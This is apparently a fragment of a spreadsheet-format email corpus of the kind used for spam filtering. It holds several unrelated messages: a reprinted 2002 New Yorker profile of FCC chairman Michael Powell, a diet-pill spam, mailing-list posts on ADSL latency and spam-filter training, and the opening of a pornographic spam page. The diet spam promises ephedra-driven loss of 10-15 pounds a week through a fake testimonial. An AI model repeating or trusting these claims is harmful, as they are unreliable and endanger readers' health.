 &gt; the home, or slowly die. The victors in the consolidation game will cut 
 &gt; back on innovation and raise prices, which will create further pressure 
 &gt; for alternatives.
 &gt;
 &gt; Lemann is right that policy-making looks much drier and more ambiguous 
 &gt; on the ground than through the lens of history. But he's wrong in 
 &gt; thinking that telecom's future will be something like its past.
 &gt;
 &gt; Friday, October 04, 2002
 &gt; 11:17:11 AM comments{0}
 ==============================================================
 http://www.newyorker.com/printable/?fact/021007fa_fact
 THE CHAIRMAN	
 by NICHOLAS LEMANN
 He's the other Powell, and no one is sure what he's up to.
 New Yorker, October 8, 2002
 Last year, my middle son, in eighth grade and encountering his first 
 fairly serious American-history course, indignantly reported that the 
 whole subject was incomprehensible. I was shocked. What about Gettysburg 
 and the Declaration of Independence and the Selma-to-Montgomery march? 
 Just look at my textbook, he said, and when I did I saw his point. His 
 class had got up to the eighteen-forties. What I expected was a big 
 beefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, 
 there was some of that. But the main difference between my son's text 
 and that of my own childhood was that somebody had made the disastrous 
 decision to devote most of it to what had actually happened in American 
 history. There were pages and pages on tariffs and bank charters and 
 reciprocal trade agreements. I skipped ahead, past the Civil War, hoping 
 for easier going, only to encounter currency floats and the regulation 
 of freight rates. Only a few decades into the twentieth century did it 
 become possible to see the federal government's main function as 
 responding to dramatic crises and launching crusades for social justice, 
 instead of attempting to referee competing claims from economic 
 interests.
 Even now, if one were to reveal what really goes on behind the pretty 
 speeches and the sanctimonious hearings in Washington, what you'd find 
 is thousands of lawyers and lobbyists madly vying for advantage, not so 
 much over the public as over each other: agribusiness versus real 
 estate, banks versus insurance companies, and so on. The arena in which 
 this competition mainly takes place is regulatory agencies and 
 commissions and the congressional committees that supervise them. It's 
 an insider's game, less because the players are secretive than because 
 the public and the pressencouraged by the players, who speak in jargon
 can't get themselves interested.
 One corner of Washington might be called F.C.C. World, for the Federal 
 Communications Commission. F.C.C. World has perhaps five thousand 
 denizens. They work at the commission itself, at the House and Senate 
 commerce committees, and at the Washington offices of the companies that 
 the commission regulates. They read Communications Daily (subscription 
 price: $3,695 a year), and every year around Christmastime they 
 grumblingly attend the Chairman's Dinner, at a Washington hotel, where 
 the high point of the evening is a scripted, supposedly self-deprecating 
 comedy routine by the commission's chairman.
 Of all the federal agencies and commissions, the F.C.C. is the one that 
 Americans ought to be most interested in; after all, it is involved with 
 a business sector that accounts for about fifteen per cent of the 
 American economy, as well as important aspects of daily lifetelephone 
 and television and radio and newspapers and the Internet. And right now 
 F.C.C. World is in, if not a crisis, at least a very soapy lather, 
 because a good portion of what the angry public thinks of as the 
 "corporate scandals" concerns the economic collapse of companies 
 regulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, 
 among others, are (or were) part of F.C.C. World. AOL Time Warner is 
 part of F.C.C. World. Jack Grubman, the former Salomon Smith Barney 
 analyst who seems to have succeeded Kenneth Lay, of Enron, as the 
 embodiment of the corporate scandals, is part of F.C.C. World. In the 
 past two years, companies belonging to F.C.C. World have lost trillions 
 of dollars in stock-market valuation, and have collectively served as a 
 dead weight pulling down the entire stock market.
 This year, an alarmed and acerbic anonymous memorandum about the state 
 of the F.C.C. has been circulating widely within F.C.C. World. It evokes 
 F.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") 
 and suggests why nobody besides residents of F.C.C. World has thought of 
 the commission in connection with the corporate scandals. The sentence I 
 just quoted is followed by this explanation: "The ILECs appear likely to 
 enter all l.d. markets within twelve months, while losing virtually no 
 residential customers to attackers since 1996, and suffering about 10% 
 market share loss in business lines to CLECs." It's a lot easier to 
 think about evil C.E.O.s than to decipher that.
 Even in good times, F.C.C. World pays obsessive attention to the 
 commission's chairman. In bad times, the attention becomes especially 
 intense; and when the chairman is a celebrity F.C.C. World devotes 
 itself to full-time chairman-watching. The current chairman, Michael 
 Powell, is a celebrity, at least by government-official standards, 
 because he is the only son of Colin Powell, the Secretary of State. 
 Unlike his father, he has a kind of mesmerizing ambiguity, which 
 generates enormous, and at times apoplectically toned, speculation about 
 who he really is and what he's really up to. Powell is young to be the 
 head of a federal agencyhe is thirty-nineand genially charming. 
 Everybody likes him. Before becoming chairman, he was for three years 
 one of the F.C.C.'s five commissioners; not only is he fluent in the 
 F.C.C.'s incomprehensible patois, he has a Clintonesque love of the 
 arcane details of communications policy. He's always saying that he's an 
 "avid moderate." And yet he has a rage-inciting quality. One of his 
 predecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell 
 to Herbert Hoover. Mark Cooper, of the Consumer Federation of America, 
 calls him "radical and extreme." Just as often as he's accused of being 
 a right-wing ideologue, Powell gets accused of being paralytically 
 cautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," 
 another former chairman, William Kennard, says. "You have to have an 
 answer." One day last spring, Powell, testifying before a Senate 
 subcommittee, delivered an anodyne opening statement, and the 
 subcommittee's chairman, Ernest Hollings, of South Carolina, berated 
 him. "You don't care about these regulations," Hollings said. "You don't 
 care about the law or what Congress sets down. . . . That's the 
 fundamental. That's the misgiving I have of your administration over 
 there. It just is amazing to me. You just pell-mell down the road and 
 seem to not care at all. I think you'd be a wonderful executive 
 vice-president of a chamber of commerce, but not a chairman of a 
 regulatory commission at the government level. Are you happy in your 
 job?"
 "Extremely," Powell said, with an amiable smile.
 One cannot understand Powell's maddening effect, at least on Democrats 
 and liberal activists, without understanding not just the stated purpose 
 of the commission he chairs but also its real purpose. The F.C.C. was 
 created by Congress in 1934, but it existed in prototype well before the 
 New Deal, because it performs a function that is one of the classic easy 
 cases for government intervention in the private economy: making sure 
 that broadcasters stick to their assigned spots on the airwaves. Its 
 other original function was preventing American Telephone &amp; Telegraph, 
 the national monopoly phone company, from treating its customers 
 unfairly. Over the decades, as F.C.C. World grew up into a comfortable, 
 well-established place, the F.C.C. segued into the role of industrial 
 supervisionits real purpose. It was supposed to manage the competition 
 among communications companies so that it didn't become too bloody, by 
 artfully deciding who would be allowed to enter what line of business. 
 In addition to looking out for the public's interest, the commission 
 more specifically protected the interests of members of Congress, many 
 of whom regard the media companies in their districts as the single most 
 terrifying category of interest groupyou can cross the local bank 
 president and live to tell the tale, but not the local broadcaster. 
 According to an oft-told F.C.C. World anecdote, President Clinton once 
 blocked an attempt to allow television stations to buy daily newspapers 
 in the same city because, he said, if the so-and-so who owned the 
 anti-Clinton Little Rock Democrat-Gazette had owned the leading TV 
 station in Little Rock, too, Clinton would never have become President.
 F.C.C. World may have been con tentious, but it was settled, too, 
 because all the reasonably powerful players had created secure economic 
 niches for themselves. Then, in the nineteen-eighties, the successful 
 breakup of A.T. &amp; T.by far the biggest and most important company the 
 commission regulateddeposited a thick additional sediment of 
 self-confidence onto the consciousness of F.C.C. World. A generation 
 ago, for most Americans, there was one local phone company, one 
 long-distance company, and one company that manufactured telephones, 
 which customers were not permitted to ownand they were all the same 
 company. It was illegal to plug any device into a phone line. By the 
 mid-nineteen-nineties, there were a dozen economically viable local 
 phone companies, a handful of national long-distance companies competing 
 to offer customers the lowest price and best service, and stores 
 everywhere selling telephone equipment from many manufacturersand 
 millions of Americans had a fax machine and a modem operating over the 
 telephone lines. A.T. &amp; T. had argued for years that it was a "natural 
 monopoly," requiring protection from economic competition and total 
 control over its lines. So much for that argument. Over the same period, 
 the F.C.C. had assisted in the birth of cable television and cell phones 
 and the Internet. It was the dream of federal-agency success come true: 
 consumers vastly better served, and the industry much bigger and more 
 prosperous, too.
 The next big step was supposed to be the Telecommunications Act of 1996, 
 one of those massive, endlessly lobbied-over pieces of legislation which 
 most people outside F.C.C. World probably felt it was safe to ignore. 
 Although the Telecom Act sailed under the rhetorical banner of 
 modernization and deregulation, its essence was a grand interest-group 
 bargain, in which the local phone companies, known to headline writers 
 as "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version 
 of RBOCs, or regional Bell operating companies), would be permitted to 
 offer long-distance service in exchange for letting the long-distance 
 companies and smaller new phone companies use their lines to compete for 
 customers. Consumers would win, because for the first time they would 
 get the benefits of competition in local service while getting even more 
 competition than they already had in long distance. But the politics and 
 economics of the Telecom Act (which was shepherded through Congress by 
 Vice-President Gore) were just as important. Democrats saw the act as 
 helping to reposition them as the technology partythe party that 
 brought the Internet into every home, created hundreds of thousands of 
 jobs in new companies, and, not least, set off an investment boom whose 
 beneficiaries might become the party's new contributor base. Clinton's 
 slogans about the "information superhighway" and "building a bridge to 
 the twenty-first century," which, like all Clinton slogans, artfully 
 sent different messages to different constituencies, were the rhetorical 
 correlates of the Telecom Act, and Gore's cruise to the Presidency was 
 supposed to be powered substantially by the act's success.
 The F.C.C. had a crucial role in all this. The arbocks are rich, 
 aggressive, politically powerful, and generally Republican (though like 
 all important interest groups they work with both parties); they 
 immediately filed lawsuits, which wound up tying the hands of their new 
 competitors in the local phone market for more than three years. Through 
 rule-making, enforcement, and litigation, the F.C.C., then headed by 
 Reed Hundt, who was Gore's classmate at St. Albans, was supposed to keep 
 the arbocks in their cages, so that not only long-distance companies 
 like A.T. &amp; T. and MCI WorldCom but also a whole category of new 
 companies, "see-lecks" (the pronounced version of CLECs, or competitive 
 local exchange carriers), could emerge. This entailed the regulatory 
 equivalent of hand-to-hand combat: the see-leck is supposed to have 
 access to the arbock's switching equipment, the arbock won't give the 
 seeleck a key to the room where it's kept, so the see-leck asks the 
 F.C.C. to rule that the arbock has to give it the key.
 Partly because Hundt assured the see-lecks and other new companies that 
 he would protect them, and partly because of the generally booming 
 condition of the economy then, investment capital flooded into the 
 see-leckscompanies with names like Winstar, Covad, and Teligentand 
 into other telecommunications companies. Even not obviously related 
 technology companies like Cisco Systems benefitted from the telecom 
 boom: demand for their products was supposed to come from the see-lecks 
 and other new players. There would be no conflict between the interests 
 of the new telecom companies and those of consumers; as one of Hundt's 
 former lieutenants told me, "Reed used to joke that my job was to make 
 sure that all prices went down and all stocks went up."
 The years following the passage of the Telecom Act were the peak of the 
 boom. Wall Street had its blood up, and that meant not just more 
 startups but also more mergers of existing communications companies: 
 Time Warner and AOL decided to throw in together, and A.T. &amp; T. and 
 Comcast, and so on. (Surely, WorldCom and the other telecom bad guys 
 believed that their self-dealing, stock-overselling, and creative 
 accounting would go unnoticed because the market was so 
 undiscriminating.)
 By the time the outcome of the 2000 Presidential election had been 
 determined, the telecom crash was well under way. Nonetheless, the 
 chairmanship of the F.C.C. remained one of the best jobs, in terms of 
 influence and visibility, available to a career government regulator. 
 Three Republicans emerged as candidates: Powell, who was a commissioner; 
 Harold Furchtgott-Roth, the farthest-to-the-right commissioner; and 
 Patrick Wood, the head of the Texas Public Utility Commission and, as 
 such, a George W. Bush guy. In Texas, however, Wood had crossed the most 
 powerful person in the arbock camp, Edward Whitacre, the C.E.O. of 
 S.B.C. Communications, which is headquartered in San Antonio. This meant 
 that the arbocks didn't want Wood as head of the F.C.C., because he 
 might be too pro-see-leck. (Wood is now the head of the Federal Energy 
 Regulatory Commission.) Michael Powell had to signal the arbocks that he 
 wasn't as threatening as Wood, while also signalling the conservative 
 movement that he was only negligibly farther to the left than 
 Furchtgott-Roth.
 Powell did this deftly. For example, in December of 2000 he appeared 
 before a conservative group called the Progress &amp; Freedom Foundation and 
 gave a very Michael Powell speechwhimsical, intellectual, and 
 free-associative (Biblical history, Joseph Schumpeter, Moore's Law)that 
 began by making fun of the idea that the F.C.C. should try to keep new 
 telecom companies alive. "In the wake of the 1996 Act, the F.C.C. is 
 often cast as the Grinch who stole Christmas," Powell said. "Like the 
 Whos, down in Who-ville, who feast on Who-pudding and rare Who-roast 
 beast, the communications industry was preparing to feast on the 
 deregulatory fruits it believed would inevitably sprout from the Act's 
 fertile soil. But this feast the F.C.C. Grinch did not like in the 
 least, so it is thought." Thus Powell was indicating that if he became 
 chairman he didn't expect to administer first aid to the see-lecks as 
 part of the job. He was appointed to the chairmanship on the first day 
 of the Bush Administration.
 Twenty months into the Administration, nearly all the see-lecks are dead 
 or dying; nearly all long-distance companies, not just WorldCom, are in 
 serious trouble; cable companies have lost half their value; satellite 
 companies are staggering. The crash has had an automatically 
 concentrating effect, because as new companies die the existing 
 companies' market share increases, and, if the existing companies are in 
 good shape financially, they have the opportunity to pick up damaged 
 companies at bargain prices. During the Bush Administration, as the 
 financial carnage in communications has worsened, the communications 
 industry has moved in the direction of more concentration. If the Bells 
 wind up protecting their regional monopolies in local phone service, and 
 if they also merge, the country will be on its way to having a national 
 duopoly in local service: Verizon, in the East, and S.B.C., in the West. 
 And these companies could dominate long distance as well, because of the 
 poor health of the long-distance companies.
 The cable business also seems close to having two dominant national 
 companies, AOL Time Warner and Comcast. Unlike the phone companies, they 
 don't have to share their wiring with other companies and so can more 
 fully control what material they allow to enter people's homes. As part 
 of the complicated bargaining with interest groups that led to the 1996 
 Telecom Act, the limits on concentration in the radio industry were 
 significantly loosened, and in the past six years the number of 
 radio-station owners in the United States has been cut by twenty-five 
 per cent; today, a large portion of local and national radio news 
 programming is supplied by a single company, Westwood One, a subsidiary 
 of Viacom.
 In this situation, many Democrats and liberals think, the F.C.C. should 
 be hyperactivethe superhero of government regulation, springing to the 
 rescue of both consumers and the communications industry. It should try 
 to breathe life into the see-lecks and other new companies. It should 
 disallow mergers, maintain ownership limits, and otherwise restrain the 
 forces of concentration. It should use the government's money and muscle 
 to get new technologyespecially fast Internet connectionsinto the 
 homes of people who can't afford it at current market prices. (An 
 analogy that a lot of people in F.C.C. World make is between telecom and 
 the Middle East: the Clinton people blame the bloodshed on the Bush 
 people, because they disengaged when they came into office, and the Bush 
 people blame it on the Clinton people, because they raised too many 
 expectations and stirred too many passions.)
 But Michael Powell's F.C.C. has not been hyperactive. Powell has been 
 conducting internal policy reviews and reforming the management of the 
 F.C.C. and waiting for the federal courts and the Congress to send him 
 signals. (In mid-September, Powell finally initiated a formal review of 
 the F.C.C.'s limits on media concentration.) This doesn't mean he has 
 been inactive; rather, he has been active in a way that further 
 infuriates his criticsin a manner that smoothly blends the genial and 
 the provocative, he muses about whether the fundamental premises of 
 F.C.C. World really make sense, while giving the impression that he's 
 having the time of his life as chairman. At his first press conference, 
 when he was asked what he was going to do about the "digital 
 divide"that is, economic inequality in access to the Internethe said, 
 "You know, I think there is a Mercedes divide. I'd like to have one and 
 I can't afford one." At the National Cable &amp; Telecommunications 
 Association convention, in Chicago, Powell, following a troupe of 
 tumblers to the stage, interrupted his walk to the podium to perform a 
 somersault.
 Not long ago, I went to see Powell in his office at the F.C.C. Until 
 1998, when the commission moved to a new building in Southwest 
 Washington, near the city's open-air fish market, F.C.C. World was at 
 the western edge of downtown, where everybody would encounter everybody 
 else at a few familiar restaurants and bars. Today, the F.C.C. building 
 looks like the office of a mortgage company in a suburban office park. 
 Even the chairman's suite, though large, is beige, carpeted, and 
 fluorescent. Powell is a bulky man who wears gold-rimmed glasses and 
 walks with a pronounced limp, the result of injuries he suffered in a 
 jeep accident in Germany, in 1987, when he was an Army officer. Because 
 of the accident, he left the Army and went to law school, where he 
 became entranced with conservative ideas about regulation, particularly 
 the idea that the government, rather than trying to correct the flaws of 
 the market before the fact"prophylactically," as he likes to sayshould 
 wait till the flaws manifest themselves and then use antitrust 
 litigation to fix them. He worked briefly at a corporate law firm, and 
 then became a protg of Joel Klein, the head of the antitrust division 
 of the Clinton Justice Department and the man who led the government's 
 legal case against Microsoft. (He was recently appointed chancellor of 
 the New York public-school system.) It testifies to Powell's political 
 skill that he is probably the only high official in the Bush 
 Administration who not only served in the Clinton Administration but 
 also maintains close ties to Bush's nemesis Senator John McCain, of 
 Arizona. One of the things about Powell that annoy people is his 
 enduring love of law school"It's sort of like a law-school study 
 session over there," one Democratic former commissioner said. As if to 
 confirm the charge, Powell, when I arrived, introduced me to four law 
 students, summer interns at the commission, whom he'd invited to sit in.
 I began by asking Powell whether he agreed with the founding assumptions 
 of the F.C.C. For example, could private companies have apportioned the 
 airwaves among themselves without the government being involved?
 "I think we'll never know," Powell said. "I don't think it's an 
 automatically bad idea, the way some people will argue. Land is probably 
 the best analogue. We don't seize all the land in the United States and 
 say, 'The government will issue licenses to use land.' If my neighbor 
 puts a fence one foot onto my property line, there's a whole body of law 
 about what I can do about that, including whether I can tear it down. If 
 a wireless company was interfering with another wireless company, it's a 
 similar proposition. There are scholars who argueindeed, the famous 
 Ronald Coase treatise that won the Nobel Prize was about thisthat 
 spectrum policy is lunacy. The market could work this out, in the kinds 
 of ways that we're accustomed to."
 Talking to Powell was fun. Unlike most high government officials, he 
 doesn't seem to be invested in appearing dignified or commanding. He 
 slumps in his chair and fiddles with his tie and riffs. He speaks in 
 ironic air quotes. He's like your libertarian friend in college who 
 enjoyed staying up all night asking impertinent rhetorical questions 
 about aspects of life that everybody else takes for granted but that he 
 sees as sentimental or illogical. After a while, I asked him whether he 
 thought his predecessors' excitement about the 1996 Telecommunications 
 Act had been excessive.
 "I would start with a caveat," Powell said. "Look, I can't fault those 
 judgments in and of themselves, given the time and what people thought. 
 They were not the only ones who were hysterical about the opportunities. 
 But, frankly, I've always been a little bit critical. First of all, 
 anybody who works with the act knows that it doesn't come anywhere close 
 to matching the hyperbole that was associated with it, by the President 
 on down, about the kinds of things it's going to open up. I mean, I 
 don't know what provisions are the information-superhighway provisions, 
 or what provisions are so digitally oriented, or some of the things that 
 were a big part of the theatre of its introduction. When one starts 
 reading the details, one searches, often in vain, for these provisions. 
 But, nonetheless, there was a rising dot-com excitement, and an Internet 
 excitement, and people thought this was historic legislation, and it 
 certainly was.
 "But. We were sucking helium out of balloons, with the kinds of 
 expectations that were being bandied around, and this is before the 
 economy or the market even gets in trouble. It was a dramatically 
 exaggerated expectationby the leadership of the commission, by 
 politicians, by the market itself, by companies themselves. It was a 
 gold rush, and led to some very detrimental business decisions, ones 
 that government encouraged by its policies, frankly. Everybody wanted to 
 see numbers go up on the board."
 Powell began imitating an imagined true believer in the Telecom Act. " 
 'I want to see ten competitors. Twenty competitors! I want to see 
 thirty-per-cent market share. Fifty-per-cent market share! I want the 
 Bells to bleed! Then we'll know we've succeeded.' " Now Powell returned 
 to being Powell. "I think that expectation was astonishingly 
 unrealistic, in the short term. They wanted to see it while they're 
 there. We were starting to get drunk on the juice we were drinking. And 
 the market was getting drunk on the juice we were drinking. There's no 
 question, we went too soon too fast. Too many companies took on too much 
 debt too fast before the market really had a product, or a business 
 model."
 How could the Telecom Act have been handled better? "We could have 
 chosen policies that were less hellbent on a single objective, and were 
 slightly more balanced and put more economic discipline in the system," 
 Powell said. "Money chased what seemed like government-promised 
 opportunity. The problem with that is there's a morning after, and we're 
 in it. And the problem is there is no short fix for this problem. This 
 debt is going to take years to bring down to a realistic level. In some 
 ways, for short-term gain, we paid a price in long-term stability."
 Powell went on to say that it might have turned out differently if there 
 had been a more "reasonable" level of investment. "No, we wouldn't have 
 every home in America with competitive choice yetbut we don't anyway. I 
 don't think it's the remonopolization of telephone service. I don't buy 
 that. The Bells will prosper, but did anybody believe they wouldn't? The 
 part of the story that didn't materialize was that people thought so 
 would MCI WorldCom and Sprint."
 Other local phone companies, he added, hadn't materialized as viable 
 businesses, either, and they never might. "Everybody's always saying, 
 'The regulators did this and this and this.' But, candidly, the story's 
 quite the opposite. I think the regulators bent over backward for six 
 years to give them a chance. Conditions don't get that good except once 
 every thirty years, and it didn't happen. So, whatever the reason, we're 
 looking at a WorldCom that's teetering. We're looking at a long-distance 
 business that has had a rapid decline in its revenue base. A.T. &amp; T. is 
 breaking itself up. Sprint has struggled."
 Could the F.C.C. have done anything to make the long-distance companies 
 stronger? "At the F.C.C.? I think I'll just be blunt. My political 
 answer? Yes, there's all kinds of things we can do at the margin to try 
 to help. But I can't find thirty billion dollars for WorldCom somewhere. 
 I can't mitigate the impacts of an accounting scandal and an S.E.C. 
 investigation. Were I king, it would be wonderful, but I don't have 
 those kinds of levers. I don't know whether anybody does. At some point, 
 companies are expected to run themselves in a way that keeps them from 
 dying." Powell couldn't have made it much clearer that he doesn't think 
 it's his responsibility to do anything about the telecom crash. He has 
 demonstrated his sure political touch by making accommodationist 
 gesturesin August, for example, five months after disbanding the 
 F.C.C.'s Accounting Safeguards Division, Powell announced that he was 
 appointing a committee to study accounting standards in the 
 communications industry. But that shows that Powell is better at riding 
 out the storm than, say, Harvey Pitt, his counterpart at the Securities 
 and Exchange Commission, and does not mean that he plans to try to shore 
 up the telecom industry.
 I asked Powell if it would bother him if, for most people, only one 
 company provided cable television and only one provided local phone 
 service. "Yes," he said. "It concerns us that there's one of each of 
 those things, but let's not diminish the importance of there being one 
 of each of those things. That still is a nice suite of communications 
 capabilities, even if they aren't direct analogues of each other." 
 Anyway, Powell said, before long the phone companies will be able to 
 provide video service over their lines, and the cable companies will 
 provide data service over their lines, so there will be more choice. 
 "So, yeah, we have this anxiety: we have one of everything. The question 
 is, Does it stay that way?"
 The concentration of ownership and the concentrated control of 
 information did not appear to trouble Powell, either. He said that 
 people confuse bigness, which brings many benefits, with concentration, 
 which distorts markets. "If this were just economics, it's easy. If you 
 were to say to me, 'Mike, just worry about economic concentration,' we 
 know how to do thatthe econometrics of antitrust. I can tell you when a 
 market's too concentrated and prices are going to rise. The problem is 
 other dimensions, like political, ideological, sometimes emotional. Take 
 the question of, if everybody's controlling what you see, the assumption 
 there is that somehow there'll be this viewpoint, a monolithic 
 viewpoint, pushed on you by your media and you won't get diversity. I 
 think that's a possibility. I don't think it's nearly the possibility 
 that's ascribed to it sometimes."
 Powell explained, "Sometimes when we see very pointed political or 
 parochial programming, it gets attacked as unfair. I see some of the 
 same people who claim they want diversity go crazy when Rush Limbaugh 
 exists. They love diversity, but somehow we should run Howard Stern off 
 the planet. If it has a point of view, then it becomes accused of bias, 
 and then we have policies like"here his tone went from ironic to 
 sarcastic"the fairness doctrine, which seems to me like the antithesis 
 of what I thought those people cared about. So when somebody is pointed 
 and opinionated, we do all this stuff in the name of journalistic 
 fairness and integrity or whatever, to make them balance it out."
 F.C.C. World abounds in theories about Michael Powell. One is that he 
 can't make up his mind about how to address the crisis in the industries 
 he regulatesso he talks (and talks and talks) flamboyantly about the 
 market, in order to buy himself time. Another is that he's carrying 
 water for the arbocks and the big cable companies. Another is that he is 
 planning to run for the Senate from Virginia (or to be appointed 
 Attorney General in a second Bush term), and doesn't want to do anything 
 at the F.C.C. that would diminish his chances. Another is that he's 
 waiting to move until there is more consensus on some course of action, 
 so that he doesn't wind up going first and getting caught in the 
 crossfire between the arbocks and the cable companies and the television 
 networks. (In F.C.C. World, this is known as the Powell Doctrine of 
 Telecom, after Colin Powell's idea that the United States should never 
 commit itself militarily without a clear objective, overwhelming force, 
 and an exit strategy.) And another is that he actually believes what he 
 says, and thinks the telecommunications crash is natural, healthy, and 
 irreversible, and more concentration would be just fine.
 "This is why elections matter," Reed Hundt, who isn't happy about what 
 has become of his Telecom Act, told me. It's true that the F.C.C.much 
 more than, say, the war in Afghanistanis a case in which a Gore 
 Administration would be acting quite differently from the Bush 
 Administration. Consumers might have noticed the difference by now, but 
 there's no question whether communications companies have noticed. The 
 arbocks are doing better against their internal rivals than they would 
 have done if Gore had won. Next election, they'll help the party that 
 helped them. If the Republicans win, policy will tilt further in the 
 arbocks' favor. If they lose, perhaps the arbocks' rivalsthe 
 long-distance companies and the telecommunications upstartswith their 
 friends now in power, will stage a comeback. America's present is not 
 unrecognizably different from America's past.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: #1 DIET PILL! LOSE 88 LB OR 8 SIZES SEE PROOF                    32349
</t>
  </si>
  <si>
    <t xml:space="preserve">Long time no chat!
 How have you been? If you've been like me, you've been trying
 trying almost EVERYTHING to lose weight.=A0 I know how you feel
 - the special diets, miracle pills, and fancy exercise=20
 equipment never helped me lose the pounds I needed to lose
 either.=A0 It seemed like the harder I worked at it, the less
 weight I lost - until I heard about 'Extreme Power Plus'.
 You're probably thinking to yourself, "Oh geez, not another
 miracle diet pill!"=A0 Like you, I was skeptical at first, but=20
 my sister said it helped her lose 23 pounds in just 2 weeks,=20
 so I told her I'd give it a try.=A0 I mean, there was nothing=20
 to lose except a lot of weight!=A0 Let me tell you, it was
 the best decision I've ever made.  PERIOD.  Six months later,
 as I'm writing this message to you, I've gone from 355 pounds
 to 210 pounds, and I haven't changed my exercise routine or diet
 at all.=A0 Yes, I still eat pizza, and lots of it!
 I was so happy with the results that I contacted the manufacturer
 and received permission to resell it - at a HUGE discount.=A0I feel
 the need to help other people lose weight like I did, because it
 does so much for your self-esteem, not to mention your health.
 I am giving you my personal pledge that 'Extreme Power Plus'
 absolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!
 If you are frustrated with trying other products, without having=20
 any success, and just not getting the results you were promised,
 then I recommend the only product that worked for me -=20
 'EXTREME POWER PLUS'!
 You're probably asking yourself, "Ok, so how does this stuff
 actually work?"
 Extreme Power Plus contains Lipotropic fat burners and ephedra which=20
 is scientifically proven to increase metabolism and cause rapid=20
 weight loss. No "hocus pocus" in these pills - just RESULTS!!!=20
 Here is the bottom line ...
 I can help you lose 10-15 pounds per week naturally, without
 exercising and without having to eat rice cakes all day.=A0=20
 Just try it for one month - there's pounds to lose and confidence=20
 to gain!=A0 You will lose weight fast - GUARANTEED.=A0 This is my
 pledge to you.
 BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more!=A0=20
 To order Extreme Power Plus on our secure server, just click
 on this link -&gt; http://www.2002dietspecials.com/
 To see what some of our customers have said about this product,=20
 visit http://www.2002dietspecials.com/testimonials.shtml
 To see a list of ingredients and for more information
 on test studies and how it will help you lose weight, visit=20
 http://www.2002dietspecials.com/ingre1.shtml
 **************************************************************
 If you feel that you have received this email in error, please=20
 send an email to "print2@btamail.net.cn" requesting to be=20
 removed. Thank you, and we apologize for any inconvenience.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</si>
  <si>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[IIU] Eircom aDSL Nat'ing
</t>
  </si>
  <si>
    <t xml:space="preserve">At 17:10 22/08/2002 +0100, Nick Hilliard wrote:
 &gt; &gt; apologies for the possible silly question (i don't think it is, but),
 &gt; &gt; but is Eircom's aDSL service NAT'ed?
 &gt;
 &gt;No - you get unfiltered access with a real (but dynamic) IP address.
 &gt;
 &gt; &gt; and what implications would that have for VoIP? I know there are
 &gt; &gt; difficulties with VoIP or connecting to clients connected to a NAT'ed
 &gt; &gt; network from the internet wild (i.e. machines with static, real IPs)
 &gt;
 &gt;You will probably suffer from the high latency of DLS lines.  Typically,
 &gt;you're talking about 50ms RTT to the local bas, which is pretty high.
 &gt;If your voip application can handle this, then you're ok.
 &gt;
 &gt;Nick
 what's the deal with all this latency? it's not like that in other places 
 where I've used dsl. i read some story about it being done that way to 
 allow greater distances to be covered or something like that. however, my 
 knowledge of physics is really only newtonian, and I don't understand how 
 worsening latency could possibly improve the reliability of a 2000 foot 
 long piece of copper. Perhaps it has something to do with stretching the 
 time-space continuum? can someone explain this in words of five syllables 
 or less?
 a.
 &gt;_______________________________________________
 &gt;IIU mailing list
 &gt;IIU@iiu.taint.org
 &gt;http://iiu.taint.org/mailman/listinfo/iiu
 --
 Antoin O Lachtnain
 **  antoin@eire.com ** http://www.eire.com ** +353-87-240-6691
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A man, a can, and a plan. Recipes for loser single guys
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8260638,1717/
 Date: 2002-09-26T02:16:24+01:00
 (Some Comic Book Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 6 Sep 2002 at 10:31, Guido van Rossum wrote:
 &gt;   your mail, and gives you only the non-spam.  To train it, you'd only need
 &gt;   to send it the false negatives somehow; it can assume that anything is
 &gt;   ham that you don't say is spam within 48 hours.
 I have folks who leave their email programs running 24 hours a day, constantly polling 
 for mail. If they go away for a long weekend, lots of "friday night spam" will become 
 ham on sunday night.  (Friday night seems to be the most popular time)
 &gt; - Your idea here.
 Ultimately I'd like to see tight integration into the "most popular email clients".. As a 
 stop-gap to the auto-ham ..
 How about adding an IMAP server with a spam and deleted-ham folder. Most email 
 clients can handle IMAP. Users should be able to quickly move "spam" into the spam 
 folder. 
 Instead of deleting messages (or, by reprogramming the delete function) they can 
 quickly move ham into the ham folder.
 In either case, the message would be processed and then destroyed.
 Brad Clements,                bkc@murkworks.com   (315)268-1000
 http://www.murkworks.com                          (315)268-9812 Fax
 AOL-IM: BKClements
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:
 &gt; This is, I think the biggest fallacy here.  You don't have to 
 &gt; block jack shit to get a high trust rating, you just have to 
 &gt; confirm Razor's existing opinion on a large number of messages:
 &gt; 
 &gt; if(check() == spam) then submit() else revoke()
 &gt; 
 &gt; That algorithm boosts trust, but reduces the information in 
 &gt; SpamNet by damping.
 Again, this is not true. Only certain events (reports/revokes) for a spam
 are rewarded and the algorithm for picking these up is based on many
 different factors.
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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</si>
  <si>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Wanna see me get fisted?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Fist Bang FPA&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#990000&gt;
 &lt;TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center" width="600"&gt;
   &lt;TR&gt; 
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=56 HEIGHT=1&gt;&lt;/TD&gt;
